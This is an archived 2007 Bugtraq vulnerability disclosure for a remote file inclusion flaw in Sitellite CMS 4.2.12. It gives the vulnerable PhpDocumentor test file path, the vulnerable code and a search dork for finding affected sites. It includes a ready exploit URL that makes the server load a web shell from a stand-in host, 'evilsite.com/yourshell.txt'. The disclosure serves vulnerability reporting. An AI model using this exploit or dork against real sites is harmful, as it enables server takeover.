| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20070616162416.8770.qmail@securityfocus.com>
Date: 16 Jun 2007 16:24:16 -0000
From: CarcaBot@...caBot.ro
To: bugtraq@...urityfocus.com
Subject: Sitellite cms <= 4.2.12 RFI Vuln
############################################################
# Link: http://www.sitelliteforge.com/index/siteforge-download-action/proj.sitellite?dl=sitellite-4.2.12-stable.tar.gz
# version 4.2.12
# Dork : "Powered by Sitellite"
# FOUND BY : CarcaBot
# CarcaBot@...caBot.ro
# Website: http://www.sitellite.org/
# DOWNLOAD : http://www.sitelliteforge.com/index/siteforge-app/proj.sitellite
# REMOTE FILE ICLUDE
############################################################
# FILE :
# PATH\saf\lib\PEAR\PhpDocumentor\Documentation\tests\bug-559668.php
############################################################
# EXP:
# site.com\path\saf\lib\PEAR\PhpDocumentor\Documentation\tests\559668.php?FORUM[LIB]=http://evilsite.com/yourshell.txt?
############################################################
# CODE: on line 4
# <?php
# /** @package tests */
# /** include tests */
# require_once $FORUM['LIB'] . '/classes/db/PearDb.php';
# require PEAR . 'test' . 'me';
# include('file.ext');
# include 'file.ext';
# include(PEAR . 'test' . 'me');
# ?>
############################################################
# http://Hacking.CarcaBot.ro - Romanian Electronic Network Security Lab Team !
# CarcaBot@...caBot.ro - Support@...caBot.ro
# Thanks to RENSLT Crew
############################################################
#
# PhpDocumentor directory is .htaccess'ed
Powered by blists - more mailing lists